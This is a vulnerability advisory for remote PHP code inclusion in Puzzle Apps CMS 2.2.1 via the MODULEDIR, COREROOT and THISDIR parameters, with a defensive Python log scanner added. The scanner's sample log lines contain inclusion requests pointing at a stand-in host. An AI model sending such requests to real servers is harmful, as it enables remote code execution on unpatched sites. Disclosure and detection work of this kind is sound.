PT-2007-6240 · Puzzle Apps · Puzzle Apps Cms

Arfis · Published 2007-10-01 · Updated 2008-09-05 · CVE-2007-5147

CVSS v2.0: 6.8 (Medium)

Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions

Puzzle Apps CMS version 2.2.1

Description

The issue allows remote attackers to execute arbitrary PHP code. This can be achieved via a URL in the MODULEDIR parameter to various PHP files, including 'core/modules/my/my.module.php' and 'core/modules/xml/xml.module.php'. Additionally, the COREROOT parameter in files such as 'config.loader.php', 'platform.loader.php', and others in the 'core/' directory or 'install/steps/step 3.php' can be exploited. The THISDIR parameter in files like 'people.lib.php', 'general.lib.php', and others in 'core/modules/admin/libs/' or 'core/modules/webstat/MEC/index.php' is also vulnerable.

Recommendations

For Puzzle Apps CMS version 2.2.1, consider disabling the MODULEDIR, COREROOT, and THISDIR parameters in the affected PHP files until a patch is available. Restrict access to the vulnerable modules and files, such as 'my.module.php', 'xml.module.php', 'config.loader.php', and others, to minimize the risk of exploitation. Avoid using the MODULEDIR, COREROOT, and THISDIR parameters in the affected API endpoints until the issue is resolved.
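
To see whether the three parameters named above are being supplied to PHP files on a given installation, the web server access log can be scanned as below. This is an added example, not part of the advisory or of Puzzle Apps CMS; it assumes Apache/nginx combined log format, and the sample log lines, addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the advisory text.
PARAMS = {"MODULEDIR", "COREROOT", "THISDIR"}
# A value that names a remote resource: scheme://... or protocol-relative //host
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)
# Client, request target and status of a combined-format entry (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def scan(lines):
    """Return one finding per request to a .php file that sets one of the
    advisory's parameters; 'remote' is True when the value looks like a URL."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.match(line)
        if not m:
            continue  # not a parseable request entry
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(".php"):
            continue
        # parse_qsl percent-decodes, so an encoded scheme (http%3A%2F%2F) is caught
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in PARAMS:
                findings.append({"line": n, "client": client, "path": url.path,
                                 "param": name, "status": int(status),
                                 "remote": bool(REMOTE.match(value))})
    return findings

# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE = [
    '192.0.2.10 - - [01/Oct/2007:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Oct/2007:10:00:05 +0000] "GET /core/modules/my/my.module.php?MODULEDIR=http%3A%2F%2Fhost.example%2Fx HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Oct/2007:10:00:09 +0000] "GET /core/config.loader.php?COREROOT=//host.example/x HTTP/1.0" 404 210',
    '192.0.2.44 - - [01/Oct/2007:10:01:00 +0000] "GET /core/modules/admin/libs/people.lib.php?THISDIR=./ HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Access logs record only the query string, so a value sent in a POST body or cookie will not show up in this scan.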

Fix

Code Injection

Weakness Enumeration

Related identifiers

CVE-2007-5147

Affected products

Puzzle Apps Cms